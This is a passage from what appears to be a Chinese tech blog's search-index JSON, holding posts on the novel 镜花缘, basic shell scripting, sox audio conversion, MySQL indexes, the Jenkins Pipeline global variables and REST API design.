君子国 君子国讲究好让不争,惟善为宝。说的是这个国家的人啊,素质非常高,高到什么地步呢?高到有点反人类。\n下面的一个场景,是我从小说中简化的一个场景:\n买家说:老板,你的东西质量真好,价格却那么低,如果我买了去,我内心会不安的。跪求你抬高些价格,我才买,不然我就不买了。\n店铺老板说:我要的价格这么高,已经觉得过意不去了,如果你还让我涨价,那你还是去别的地方买东西吧。\n买家说:既然你不愿意涨价,那也行,我还按照这个价格买你的东西,但是我只拿一半东西走。\n是不是很反人类,从来只见过买家想要压低价格的,还未听说过买家想抬高价格的。\n2. 大人国 此处的大人国,并不是说他们的身材巨大,而是形容他们国人的品格高大。他们都是争相做善事,不作恶事。\n除此以外,在他们的国家,很容易区分好人和坏人。他们所有的人脚下都踩着云。光明正大的人,脚下是彩云;经常做坏事的人,脚下是黑云。\n云的色彩会随着人的品行而变化,坏人如果能够向善,足下也会产生彩云。\n有些大官人,不希望别人看到他们脚下云的颜色,所以会用布裹上,但是这样做岂不是掩耳盗铃吗?\n3. 黑齿国 这个国家的人全身通黑,连牙齿都是黑的。我怀疑作者是不是去过非洲,但是非洲人的牙齿往往都是白色的。\n但是人不可貌相,黑齿国的人非常喜欢读书,个个都是满腹经纶。而且这个地方的小偷,只会偷书,却不偷金银宝物。\n4. 劳民国 该国的人也是面色墨黑,走路都是摇摇晃晃,终日忙忙碌碌。但是呢,这个国家的人每个都是长寿。\n5. 聂耳国 聂耳国的耳朵很长,长耳及腰,走路都需要用手去捧着耳朵。更有甚者,耳朵及地。\n除了耳朵长的这个特点之外,有的人耳朵也特别大。据说可以一个耳朵当床垫,一个耳朵当棉被,睡在自己的耳朵里。\n6. 无肠国 这个国家的人都没有肠子,无论吃喝什么东西,都会立即排出体外。所以他们在吃饭之前,都先找好厕所,不然就变成随地大小便了。\n更为恶心的是,因为他们吃的快也拉的快,很多食物都没有消化完全。所以有些人就把拉出来的便便收集起来,再给其他人吃。\n7. 鬼国 国人夜晚不睡觉,颠倒白天黑夜,行为似鬼。\n8. 毛民国 国人一身长毛,据说是上一世太过吝啬,一毛不拔。所以阎王让他下一世出生在毛民国,让他们满身长满毛。\n9. 无继国 国人从不生育,也没有孩子。而且他们也不区分男女。\n之所以他们国家的人口没有减少,是因为人死后120年之后还会再次复活。\n所以他们都是死了又活,活了又死。\n10. 深目国 他们脸上没有眼睛,他们的两个眼睛都长在自己的手掌里。是不是觉得似曾相识呢?火影里面的我爱罗。\n","permalink":"https://wdd.js.org/posts/2019/10/zfn92c/","summary":"《镜花缘》是清代李汝珍写的一部长篇小说,小说前半部分是主角游历海外各国的神奇经历,有点像日本动漫海贼王。后半部分比较无趣,略过不提。\n单讲小说的前半部分,小说发生在唐代,主角叫做唐敖,本来科举中了探花,但是因为他和讨伐武则天的徐敬业有结拜之交,被人告发,遂革去了探花,降为秀才。\n唐敖心灰意冷,煮熟的鸭子就这么飞了。于是决定舍弃功名,游历山水。正好他的妹夫,林之洋是个跑远洋贸易的。\n唐敖正好搭上了妹夫的顺风船,环游世界之旅就这么开始了!!\n1. 君子国 君子国讲究好让不争,惟善为宝。说的是这个国家的人啊,素质非常高,高到什么地步呢?高到有点反人类。\n下面的一个场景,是我从小说中简化的一个场景:\n买家说:老板,你的东西质量真好,价格却那么低,如果我买了去,我内心会不安的。跪求你抬高些价格,我才买,不然我就不买了。\n店铺老板说:我要的价格这么高,已经觉得过意不去了,如果你还让我涨价,那你还是去别的地方买东西吧。\n买家说:既然你不愿意涨价,那也行,我还按照这个价格买你的东西,但是我只拿一半东西走。\n是不是很反人类,从来只见过买家想要压低价格的,还未听说过买家想抬高价格的。\n2. 大人国 此处的大人国,并不是说他们的身材巨大,而是形容他们国人的品格高大。他们都是争相做善事,不作恶事。\n除此以外,在他们的国家,很容易区分好人和坏人。他们所有的人脚下都踩着云。光明正大的人,脚下是彩云;经常做坏事的人,脚下是黑云。\n云的色彩会随着人的品行而变化,坏人如果能够向善,足下也会产生彩云。\n有些大官人,不希望别人看到他们脚下云的颜色,所以会用布裹上,但是这样做岂不是掩耳盗铃吗?\n3. 黑齿国 这个国家的人全身通黑,连牙齿都是黑的。我怀疑作者是不是去过非洲,但是非洲人的牙齿往往都是白色的。\n但是人不可貌相,黑齿国的人非常喜欢读书,个个都是满腹经纶。而且这个地方的小偷,只会偷书,却不偷金银宝物。\n4. 劳民国 该国的人也是面色墨黑,走路都是摇摇晃晃,终日忙忙碌碌。但是呢,这个国家的人每个都是长寿。\n5. 聂耳国 聂耳国的耳朵很长,长耳及腰,走路都需要用手去捧着耳朵。更有甚者,耳朵及地。\n除了耳朵长的这个特点之外,有的人耳朵也特别大。据说可以一个耳朵当床垫,一个耳朵当棉被,睡在自己的耳朵里。\n6. 无肠国 这个国家的人都没有肠子,无论吃喝什么东西,都会立即排出体外。所以他们在吃饭之前,都先找好厕所,不然就变成随地大小便了。\n更为恶心的是,因为他们吃的快也拉的快,很多食物都没有消化完全。所以有些人就把拉出来的便便收集起来,再给其他人吃。\n7. 鬼国 国人夜晚不睡觉,颠倒白天黑夜,行为似鬼。\n8. 毛民国 国人一身长毛,据说是上一世太过吝啬,一毛不拔。所以阎王让他下一世出生在毛民国,让他们满身长满毛。\n9. 无继国 国人从不生育,也没有孩子。而且他们也不区分男女。\n之所以他们国家的人口没有减少,是因为人死后120年之后还会再次复活。\n所以他们都是死了又活,活了又死。\n10. 
深目国 他们脸上没有眼睛,他们的两个眼睛都长在自己的手掌里。是不是觉得似曾相识呢?火影里面的我爱罗。","title":"带你领略镜花缘中的神奇国度"},{"content":"主要的数据运算方式\nlet (()) [] expr bc 使用 let 使用 let 时,等号右边的变量不需要在加上$符号\n#!/bin/bash no1=1; no2=2; # 注意两个变量的值的类型实际上是字符串 re1=$no1+$no2 # 注意此时re1的值是1+2 let result=no1+no2 # 此时才是想获取的两数字的和,3 ","permalink":"https://wdd.js.org/shell/match-eval/","summary":"主要的数据运算方式\nlet (()) [] expr bc 使用 let 使用 let 时,等号右边的变量不需要在加上$符号\n#!/bin/bash no1=1; no2=2; # 注意两个变量的值的类型实际上是字符串 re1=$no1+$no2 # 注意此时re1的值是1+2 let result=no1+no2 # 此时才是想获取的两数字的和,3 ","title":"shell数学运算"},{"content":"获取字符串长度 需要在变量前加个**#**\nname=wdd echo ${#name} 首尾去空格 echo \u0026#34; abcd \u0026#34; | xargs 字符串包含 # $var是否包含字符串A if [[ $var =~ \u0026#34;A\u0026#34; ]]; then echo fi # $var是否以字符串A开头 if [[ $var =~ \u0026#34;^A\u0026#34; ]]; then echo fi # $var是否以字符串A结尾 if [[ $var =~ \u0026#34;A$\u0026#34; ]]; then echo fi 字符串提取 #!/bin/bash num1=${test#*_} num2=${num1#*_} surname=${num2%_*} num4=${test##*_} profession=${num4%.*} #*_ 从左边开始,去第一个符号“_”左边的所有字符 % _* 从右边开始,去掉第一个符号“_”右边的所有字符 ##*_ 从右边开始,去掉第一个符号“_”左边的所有字符 %%_* 从左边开始,去掉第一个符号“_”右边的所有字符 判断某个字符串是否以特定字符开头 if [[ $TAG =~ ABC* ]]; then echo $TAG is begin with ABC fi ","permalink":"https://wdd.js.org/shell/string-operator/","summary":"获取字符串长度 需要在变量前加个**#**\nname=wdd echo ${#name} 首尾去空格 echo \u0026#34; abcd \u0026#34; | xargs 字符串包含 # $var是否包含字符串A if [[ $var =~ \u0026#34;A\u0026#34; ]]; then echo fi # $var是否以字符串A开头 if [[ $var =~ \u0026#34;^A\u0026#34; ]]; then echo fi # $var是否以字符串A结尾 if [[ $var =~ \u0026#34;A$\u0026#34; ]]; then echo fi 字符串提取 #!/bin/bash num1=${test#*_} num2=${num1#*_} surname=${num2%_*} num4=${test##*_} profession=${num4%.*} #*_ 从左边开始,去第一个符号“_”左边的所有字符 % _* 从右边开始,去掉第一个符号“_”右边的所有字符 ##*_ 从右边开始,去掉第一个符号“_”左边的所有字符 %%_* 从左边开始,去掉第一个符号“_”右边的所有字符 判断某个字符串是否以特定字符开头 if [[ $TAG =~ ABC* ]]; then echo $TAG is begin with ABC fi ","title":"字符串操作"},{"content":"ab安装 apt-get install apache2-utils ","permalink":"https://wdd.js.org/posts/2019/10/pbv6ok/","summary":"ab安装 apt-get install apache2-utils 
","title":"接口压力测试"},{"content":"apt-get install sox libsox-fmt-mp3 -y sox input.vox output.mp3 sox支持命令 ➜ vox sox --help sox: SoX v14.4.1 Usage summary: [gopts] [[fopts] infile]... [fopts] outfile [effect [effopt]]... SPECIAL FILENAMES (infile, outfile): - Pipe/redirect input/output (stdin/stdout); may need -t -d, --default-device Use the default audio device (where available) -n, --null Use the `null\u0026#39; file handler; e.g. with synth effect -p, --sox-pipe Alias for `-t sox -\u0026#39; SPECIAL FILENAMES (infile only): \u0026#34;|program [options] ...\u0026#34; Pipe input from external program (where supported) http://server/file Use the given URL as input file (where supported) GLOBAL OPTIONS (gopts) (can be specified at any point before the first effect): --buffer BYTES Set the size of all processing buffers (default 8192) --clobber Don\u0026#39;t prompt to overwrite output file (default) --combine concatenate Concatenate all input files (default for sox, rec) --combine sequence Sequence all input files (default for play) -D, --no-dither Don\u0026#39;t dither automatically --effects-file FILENAME File containing effects and options -G, --guard Use temporary files to guard against clipping -h, --help Display version number and usage information --help-effect NAME Show usage of effect NAME, or NAME=all for all --help-format NAME Show info on format NAME, or NAME=all for all --i, --info Behave as soxi(1) --input-buffer BYTES Override the input buffer size (default: as --buffer) --no-clobber Prompt to overwrite output file -m, --combine mix Mix multiple input files (instead of concatenating) --combine mix-power Mix to equal power (instead of concatenating) -M, --combine merge Merge multiple input files (instead of concatenating) --magic Use `magic\u0026#39; file-type detection --multi-threaded Enable parallel effects channels processing --norm Guard (see --guard) \u0026amp; normalise --play-rate-arg ARG Default `rate\u0026#39; argument for auto-resample with 
`play\u0026#39; --plot gnuplot|octave Generate script to plot response of filter effect -q, --no-show-progress Run in quiet mode; opposite of -S --replay-gain track|album|off Default: off (sox, rec), track (play) -R Use default random numbers (same on each run of SoX) -S, --show-progress Display progress while processing audio data --single-threaded Disable parallel effects channels processing --temp DIRECTORY Specify the directory to use for temporary files -T, --combine multiply Multiply samples of corresponding channels from all input files (instead of concatenating) --version Display version number of SoX and exit -V[LEVEL] Increment or set verbosity level (default 2); levels: 1: failure messages 2: warnings 3: details of processing 4-6: increasing levels of debug messages FORMAT OPTIONS (fopts): Input file format options need only be supplied for files that are headerless. Output files will have the same format as the input file where possible and not overriden by any of various means including providing output format options. -v|--volume FACTOR Input file volume adjustment factor (real number) --ignore-length Ignore input file length given in header; read to EOF -t|--type FILETYPE File type of audio -e|--encoding ENCODING Set encoding (ENCODING may be one of signed-integer, unsigned-integer, floating-point, mu-law, a-law, ima-adpcm, ms-adpcm, gsm-full-rate) -b|--bits BITS Encoded sample size in bits -N|--reverse-nibbles Encoded nibble-order -X|--reverse-bits Encoded bit-order --endian little|big|swap Encoded byte-order; swap means opposite to default -L/-B/-x Short options for the above -c|--channels CHANNELS Number of channels of audio data; e.g. 
2 = stereo -r|--rate RATE Sample rate of audio -C|--compression FACTOR Compression factor for output format --add-comment TEXT Append output file comment --comment TEXT Specify comment text for the output file --comment-file FILENAME File containing comment text for the output file --no-glob Don\u0026#39;t `glob\u0026#39; wildcard match the following filename AUDIO FILE FORMATS: 8svx aif aifc aiff aiffc al amb amr-nb amr-wb anb au avr awb caf cdda cdr cvs cvsd cvu dat dvms f32 f4 f64 f8 fap flac fssd gsm gsrt hcom htk ima ircam la lpc lpc10 lu mat mat4 mat5 maud mp2 mp3 nist ogg paf prc pvf raw s1 s16 s2 s24 s3 s32 s4 s8 sb sd2 sds sf sl sln smp snd sndfile sndr sndt sou sox sph sw txw u1 u16 u2 u24 u3 u32 u4 u8 ub ul uw vms voc vorbis vox w64 wav wavpcm wv wve xa xi PLAYLIST FORMATS: m3u pls AUDIO DEVICE DRIVERS: alsa EFFECTS: allpass band bandpass bandreject bass bend biquad chorus channels compand contrast dcshift deemph delay dither divide+ downsample earwax echo echos equalizer fade fir firfit+ flanger gain highpass hilbert input# ladspa loudness lowpass mcompand mixer* noiseprof noisered norm oops output# overdrive pad phaser pitch rate remix repeat reverb reverse riaa silence sinc spectrogram speed splice stat stats stretch swap synth tempo treble tremolo trim upsample vad vol * Deprecated effect + Experimental effect # LibSoX-only effect EFFECT OPTIONS (effopts): effect dependent; see --help-effect 参考 http://sox.sourceforge.net/sox.html#OPTIONS ","permalink":"https://wdd.js.org/posts/2019/10/nw4wmm/","summary":"apt-get install sox libsox-fmt-mp3 -y sox input.vox output.mp3 sox支持命令 ➜ vox sox --help sox: SoX v14.4.1 Usage summary: [gopts] [[fopts] infile]... [fopts] outfile [effect [effopt]]... SPECIAL FILENAMES (infile, outfile): - Pipe/redirect input/output (stdin/stdout); may need -t -d, --default-device Use the default audio device (where available) -n, --null Use the `null\u0026#39; file handler; e.g. 
with synth effect -p, --sox-pipe Alias for `-t sox -\u0026#39; SPECIAL FILENAMES (infile only): \u0026#34;|program [options] ...\u0026#34; Pipe input from external program (where supported) http://server/file Use the given URL as input file (where supported) GLOBAL OPTIONS (gopts) (can be specified at any point before the first effect): --buffer BYTES Set the size of all processing buffers (default 8192) --clobber Don\u0026#39;t prompt to overwrite output file (default) --combine concatenate Concatenate all input files (default for sox, rec) --combine sequence Sequence all input files (default for play) -D, --no-dither Don\u0026#39;t dither automatically --effects-file FILENAME File containing effects and options -G, --guard Use temporary files to guard against clipping -h, --help Display version number and usage information --help-effect NAME Show usage of effect NAME, or NAME=all for all --help-format NAME Show info on format NAME, or NAME=all for all --i, --info Behave as soxi(1) --input-buffer BYTES Override the input buffer size (default: as --buffer) --no-clobber Prompt to overwrite output file -m, --combine mix Mix multiple input files (instead of concatenating) --combine mix-power Mix to equal power (instead of concatenating) -M, --combine merge Merge multiple input files (instead of concatenating) --magic Use `magic\u0026#39; file-type detection --multi-threaded Enable parallel effects channels processing --norm Guard (see --guard) \u0026amp; normalise --play-rate-arg ARG Default `rate\u0026#39; argument for auto-resample with `play\u0026#39; --plot gnuplot|octave Generate script to plot response of filter effect -q, --no-show-progress Run in quiet mode; opposite of -S --replay-gain track|album|off Default: off (sox, rec), track (play) -R Use default random numbers (same on each run of SoX) -S, --show-progress Display progress while processing audio data --single-threaded Disable parallel effects channels processing --temp DIRECTORY Specify the directory 
to use for temporary files -T, --combine multiply Multiply samples of corresponding channels from all input files (instead of concatenating) --version Display version number of SoX and exit -V[LEVEL] Increment or set verbosity level (default 2); levels: 1: failure messages 2: warnings 3: details of processing 4-6: increasing levels of debug messages FORMAT OPTIONS (fopts): Input file format options need only be supplied for files that are headerless.","title":"vox语音转mp3"},{"content":"prd是表名,agent是表中的一个字段,index_agent是索引名\ncreate index index_agent on prd(agent) # 创建索引 show index from prd # 显示表上有哪些索引 drop index index_agent on prd # 删除索引 创建索引的好处是查询速度有极大的提升,坏处是更新记录时,有可能也会更新索引,从而降低性能。\n所以索引比较适合那种只写入,或者查询,但是一般不会更新的数据。\n","permalink":"https://wdd.js.org/posts/2019/10/bs9nax/","summary":"prd是表名,agent是表中的一个字段,index_agent是索引名\ncreate index index_agent on prd(agent) # 创建索引 show index from prd # 显示表上有哪些索引 drop index index_agent on prd # 删除索引 创建索引的好处是查询速度有极大的提升,坏处是更新记录时,有可能也会更新索引,从而降低性能。\n所以索引比较适合那种只写入,或者查询,但是一般不会更新的数据。","title":"MySql索引"},{"content":"今天逛github trending, 发现榜首有个项目,叫做v语言。https://github.com/vlang/v\n看了介绍,说这个语言非常牛X,几乎囊括了所有语言的长处。性能、编译耗时、内存使用都是碾压其他语言。\n但是,要记住张无忌的娘说过的一句话:越是漂亮的女人,越会骗人。\n每一门语言都有特定的使用场景,从而决定了该语言在该场景下解决问题的能力。\n不谈使用场景,而仅仅强调优点,往往是耍流氓。\n你看JavaScript一出生,就是各种问题,但是在浏览器里,JavaScript就是能够一统天下,无人能够掩盖其锋芒。\n","permalink":"https://wdd.js.org/posts/2019/10/awgyhh/","summary":"今天逛github trending, 发现榜首有个项目,叫做v语言。https://github.com/vlang/v\n看了介绍,说这个语言非常牛X,几乎囊括了所有语言的长处。性能、编译耗时、内存使用都是碾压其他语言。\n但是,要记住张无忌的娘说过的一句话:越是漂亮的女人,越会骗人。\n每一门语言都有特定的使用场景,从而决定了该语言在该场景下解决问题的能力。\n不谈使用场景,而仅仅强调优点,往往是耍流氓。\n你看JavaScript一出生,就是各种问题,但是在浏览器里,JavaScript就是能够一统天下,无人能够掩盖其锋芒。","title":"关于v语言: 越是漂亮的语言,越会骗人"},{"content":"if then // good if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi // good if [ -d public ]; then echo \u0026#34;public exist\u0026#34; fi // error: if和then写成一行时,条件后必须加上分号 if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi // error: shell对空格比较敏感,多个空格和少个空格,执行的含义完全不同 
// 在[]中,内侧前后都需要加上空格 if [-d public] then echo \u0026#34;public exist\u0026#34; fi if elif then if [ -d public ] then echo \u0026#34;public exist\u0026#34; elif then 循环 switch 常用例子 判断目录是否存在 if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi 判断文件是否存在 ","permalink":"https://wdd.js.org/shell/flow-control/","summary":"if then // good if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi // good if [ -d public ]; then echo \u0026#34;public exist\u0026#34; fi // error: if和then写成一行时,条件后必须加上分号 if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi // error: shell对空格比较敏感,多个空格和少个空格,执行的含义完全不同 // 在[]中,内侧前后都需要加上空格 if [-d public] then echo \u0026#34;public exist\u0026#34; fi if elif then if [ -d public ] then echo \u0026#34;public exist\u0026#34; elif then 循环 switch 常用例子 判断目录是否存在 if [ -d public ] then echo \u0026#34;public exist\u0026#34; fi 判断文件是否存在 ","title":"流程控制"},{"content":"打印彩色字体 0 重置 30 黑色 31 红色 32 绿色 33 黄色 34 蓝色 35 洋红 36 青色 37 白色 把 31 改成其他数字,就可打印其他颜色的 this 了。大部分情况下,我们只需要记住红色和绿色就可以了\necho -e \u0026#34;\\e[1;31m this \\e[0m whang\u0026#34; 打印彩色背景 0 重置 40 黑色 41 红色 42 绿色 43 黄色 44 蓝色 45 洋红 46 青色 47 白色 echo -e \u0026#34;\\e[1;45m this \\e[0m whang\u0026#34; ","permalink":"https://wdd.js.org/shell/colorful-print/","summary":"打印彩色字体 0 重置 30 黑色 31 红色 32 绿色 33 黄色 34 蓝色 35 洋红 36 青色 37 白色 把 31 改成其他数字,就可打印其他颜色的 this 了。大部分情况下,我们只需要记住红色和绿色就可以了\necho -e \u0026#34;\\e[1;31m this \\e[0m whang\u0026#34; 打印彩色背景 0 重置 40 黑色 41 红色 42 绿色 43 黄色 44 蓝色 45 洋红 46 青色 47 白色 echo -e \u0026#34;\\e[1;45m this \\e[0m whang\u0026#34; ","title":"彩色文本与彩色背景打印"},{"content":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.\nMethods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. 
(If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.)\nSome methods return instances of auxiliary classes which serve as holders for an ID and which have their own methods and properties. Methods taking a body return any value returned by the body itself. Some method parameters are optional and are enclosed with []. Reference:\nwithRegistry(url[, credentialsId]) {…} Specifies a registry URL such as https://docker.mycorp.com/, plus an optional credentials ID to connect to it. withServer(uri[, credentialsId]) {…} Specifies a server URI such as tcp://swarm.mycorp.com:2376, plus an optional credentials ID to connect to it. withTool(toolName) {…} Specifies the name of a Docker installation to use, if any are defined in Jenkins global configuration. If unspecified, docker is assumed to be in the $PATH of the slave agent. image(id) Creates an Image object with a specified name or ID. See below. build(image[, args]) Runs docker build to create and tag the specified image from a Dockerfile in the current directory. Additional args may be added, such as \u0026lsquo;-f Dockerfile.other \u0026ndash;pull \u0026ndash;build-arg http_proxy=http://192.168.1.1:3128 .\u0026rsquo;. Like docker build, args must end with the build context. Returns the resulting Image object. Records a FROM fingerprint in the build. Image.id The image name with optional tag (mycorp/myapp, mycorp/myapp:latest) or ID (hexadecimal hash). Image.run([args, command]) Uses docker run to run the image, and returns a Container which you could stop later. Additional args may be added, such as \u0026lsquo;-p 8080:8080 \u0026ndash;memory-swap=-1\u0026rsquo;. Optional command is equivalent to Docker command specified after the image. Records a run fingerprint in the build. Image.withRun[(args[, command])] {…} Like run but stops the container as soon as its body exits, so you do not need a try-finally block. 
Image.inside[(args)] {…} Like withRun this starts a container for the duration of the body, but all external commands (sh) launched by the body run inside the container rather than on the host. These commands run in the same working directory (normally a slave workspace), which means that the Docker server must be on localhost. Image.tag([tagname]) Runs docker tag to record a tag of this image (defaulting to the tag it already has). Will rewrite an existing tag if one exists. Image.push([tagname]) Pushes an image to the registry after tagging it as with the tag method. For example, you can use image.push \u0026rsquo;latest\u0026rsquo; to publish it as the latest version in its repository. Image.pull() Runs docker pull. Not necessary before run, withRun, or inside. Image.imageName() The id prefixed as needed with registry information, such as docker.mycorp.com/mycorp/myapp. May be used if running your own Docker commands using sh. Container.id Hexadecimal ID of a running container. Container.stop Runs docker stop and docker rm to shut down a container and remove its storage. Container.port(port) Runs docker port on the container to reveal how the port port is mapped on the host. env Environment variables are accessible from Groovy code as env.VARNAME or simply as VARNAME. You can write to such properties as well (only using the env. prefix):\nenv.MYTOOL_VERSION = \u0026#39;1.33\u0026#39; node { sh \u0026#39;/usr/local/mytool-$MYTOOL_VERSION/bin/start\u0026#39; } These definitions will also be available via the REST API during the build or after its completion, and from upstream Pipeline builds using the build step.\nHowever any variables set this way are global to the Pipeline build. For variables with node-specific content (such as file paths), you should instead use the withEnv step, to bind the variable only within a node block.\nA set of environment variables are made available to all Jenkins projects, including Pipelines. 
The following is a general list of variables (by name) that are available; see the notes below the list for Pipeline-specific details.\nBRANCH_NAME For a multibranch project, this will be set to the name of the branch being built, for example in case you wish to deploy to production from master but not from feature branches. CHANGE_ID For a multibranch project corresponding to some kind of change request, this will be set to the change ID, such as a pull request number. CHANGE_URL For a multibranch project corresponding to some kind of change request, this will be set to the change URL. CHANGE_TITLE For a multibranch project corresponding to some kind of change request, this will be set to the title of the change. CHANGE_AUTHOR For a multibranch project corresponding to some kind of change request, this will be set to the username of the author of the proposed change. CHANGE_AUTHOR_DISPLAY_NAME For a multibranch project corresponding to some kind of change request, this will be set to the human name of the author. CHANGE_AUTHOR_EMAIL For a multibranch project corresponding to some kind of change request, this will be set to the email address of the author. CHANGE_TARGET For a multibranch project corresponding to some kind of change request, this will be set to the target or base branch to which the change could be merged. BUILD_NUMBER The current build number, such as \u0026ldquo;153\u0026rdquo; BUILD_ID The current build ID, identical to BUILD_NUMBER for builds created in 1.597+, but a YYYY-MM-DD_hh-mm-ss timestamp for older builds BUILD_DISPLAY_NAME The display name of the current build, which is something like \u0026ldquo;#153\u0026rdquo; by default. JOB_NAME Name of the project of this build, such as \u0026ldquo;foo\u0026rdquo; or \u0026ldquo;foo/bar\u0026rdquo;. (To strip off folder paths from a Bourne shell script, try: ${JOB_NAME##*/}) BUILD_TAG String of \u0026ldquo;jenkins-${JOB_NAME}-${BUILD_NUMBER}\u0026rdquo;. 
Convenient to put into a resource file, a jar file, etc for easier identification. EXECUTOR_NUMBER The unique number that identifies the current executor (among executors of the same machine) that’s carrying out this build. This is the number you see in the \u0026ldquo;build executor status\u0026rdquo;, except that the number starts from 0, not 1. NODE_NAME Name of the slave if the build is on a slave, or \u0026ldquo;master\u0026rdquo; if run on master NODE_LABELS Whitespace-separated list of labels that the node is assigned. WORKSPACE The absolute path of the directory assigned to the build as a workspace. JENKINS_HOME The absolute path of the directory assigned on the master node for Jenkins to store data. JENKINS_URL Full URL of Jenkins, like http://server:port/jenkins/ (note: only available if Jenkins URL set in system configuration) BUILD_URL Full URL of this build, like http://server:port/jenkins/job/foo/15/ (Jenkins URL must be set) JOB_URL Full URL of this job, like http://server:port/jenkins/job/foo/ (Jenkins URL must be set) The following variables are currently unavailable inside a Pipeline script: SCM-specific variables such as SVN_REVISIONAs an example of loading variable values from Groovy:\nmail to: \u0026#39;devops@acme.com\u0026#39;, subject: \u0026#34;Job \u0026#39;${JOB_NAME}\u0026#39; (${BUILD_NUMBER}) is waiting for input\u0026#34;, body: \u0026#34;Please go to ${BUILD_URL} and verify the build\u0026#34; params Exposes all parameters defined in the build as a read-only map with variously typed values. Example:\nif (params.BOOLEAN_PARAM_NAME) {doSomething()} Note for multibranch (Jenkinsfile) usage: the properties step allows you to define job properties, but these take effect when the step is run, whereas build parameter definitions are generally consulted before the build begins. As a convenience, any parameters currently defined in the job which have default values will also be listed in this map. 
That allows you to write, for example:\nproperties([parameters([string(name: \u0026lsquo;BRANCH\u0026rsquo;, defaultValue: \u0026lsquo;master\u0026rsquo;)])])\ngit url: \u0026#39;…\u0026#39;, branch: params.BRANCH and be assured that the master branch will be checked out even in the initial build of a branch project, or if the previous build did not specify parameters or used a different parameter name.\ncurrentBuild The currentBuild variable may be used to refer to the currently running build. It has the following readable properties:\nnumber build number (integer) result typically SUCCESS, UNSTABLE, or FAILURE (may be null for an ongoing build) currentResult typically SUCCESS, UNSTABLE, or FAILURE. Will never be null. resultIsBetterOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is better than or equal to the provided result. resultIsWorseOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is worse than or equal to the provided result. 
displayName normally #123 but sometimes set to, e.g., an SCM commit identifier description additional information about the build id normally number as a string timeInMillis time since the epoch when the build was scheduled startTimeInMillis time since the epoch when the build started running duration duration of the build in milliseconds durationString a human-readable representation of the build duration previousBuild another similar object, or null nextBuild similarly absoluteUrl URL of build index page buildVariables for a non-Pipeline downstream build, offers access to a map of defined build variables; for a Pipeline downstream build, any variables set globally on env changeSets a list of changesets coming from distinct SCM checkouts; each has a kind and is a list of commits; each commit has a commitId, timestamp, msg, author, and affectedFiles each of which has an editType and path; the value will not generally be Serializable so you may only access it inside a method marked @NonCPS rawBuild a hudson.model.Run with further APIs, only for trusted libraries or administrator-approved scripts outside the sandbox; the value will not be Serializable so you may only access it inside a method marked @NonCPS Additionally, for this build only (but not for other builds), the following properties are writable: result displayName description scm Represents the SCM configuration in a multibranch project build. 
Use checkout scm to check out sources matching Jenkinsfile. You may also use this in a standalone project configured with Pipeline script from SCM, though in that case the checkout will just be of the latest revision in the branch, possibly newer than the revision from which the Pipeline script was loaded.\n参考 Global Variable Reference ","permalink":"https://wdd.js.org/posts/2019/10/ikg19e/","summary":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.\nMethods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.","title":"Jenkins 全局变量参考"},{"content":"1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipedia\nREST API 不是一个标准,也不是一个协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向服务端请求此API,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CRUD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. 
RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts. POST /users. PUT /users/123 - upgrade a user entity with id = 123. DELETE /users/123 - delete a user with id = 123. 6. 文档 7. 版本 版本管理一般有两种\n位于url中的版本标识: http://example.com/api/v1 位于请求头中的版本标识:Accept: application/vnd.redkavasyl+json; version=2.0 8. 深入理解状态与无状态 我认为REST架构最难理解的就是状态与无状态。下面我画出两个示意图。\n图1是有状态的服务,状态存储于单个服务之中,一旦一个服务挂了,状态就没了,有状态服务很难扩展。无状态的服务,状态存储于客户端,一个请求可以被投递到任何服务端,即使一个服务挂了,也不会影响到同一个客户端发来的下一个请求。\n【图1 有状态的架构】\n【图2 无状态的架构】\neach request from client to server must contain all of the information necessary to understand the request, and cannot take advantage of any stored context on the server. Session state is therefore kept entirely on the client. rest_arch_style stateless\n每一个请求自身必须携带所有的信息,让服务端理解这个请求。举个栗子,常见的翻页操作,应该客户端告诉服务端想要看第几页的数据,而不应该让服务端记住客户端看到了第几页。\n9. 参考 A Beginner’s Tutorial for Understanding RESTful API Versioning REST Services http://ruanyifeng.com/blog/2018/10/restful-api-best-practices.html 